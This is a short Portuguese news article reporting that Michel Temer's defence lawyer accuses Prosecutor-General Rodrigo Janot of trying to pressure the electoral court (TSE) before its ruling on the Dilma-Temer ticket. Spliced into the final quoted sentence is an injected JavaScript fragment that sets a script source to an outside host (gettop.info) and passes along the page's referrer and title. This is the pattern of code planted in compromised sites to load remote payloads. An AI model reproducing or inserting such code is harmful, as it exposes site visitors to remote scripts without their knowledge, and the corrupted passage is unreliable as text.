Janot tenta pressionar o TSE, diz defesa de Temer

Com o avanço das investigações da Lava Jato sobre o presidente Michel Temer, a defesa do peemedebista partiu para o ataque contra o Ministério Público Federal e o procurador-geral da República Rodrigo Janot.

Segundo o advogado Gustavo Guedes, da defesa de Temer, Janot mandou prender Rocha Loures para tentar influenciar o Tribunal Superior Eleitoral (TSE) a cassar a chapa Dilma-Temer e abrir caminho para eleições indiretas no país.

“Nós teríamos total tranquilidade para discutir tudo o que venha do Ministério Público. Agora a questão é o momento. Fazer isso às vésperas do julgamento do TSE nos parece uma tentativa de constranger o tribunal”, disse Guedes ao jornal Estado de S.Paulo, no domingo.

Na terça-feira (6) a corte eleitoral inicia a fase final do processo proposto pelo PSDB em 2014, no qual a chapa campanha de Dilma Rousseff-Michel Temer é acusada de abuso de poder político e econômico.

Segundo Guedes, que defende Temer no TSE, Janot manobra ao tomar medidas relacionadas à investigação neste momento. “O que estamos indignados é com a tentativa de atuação política do Ministério Público”, afirmou.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário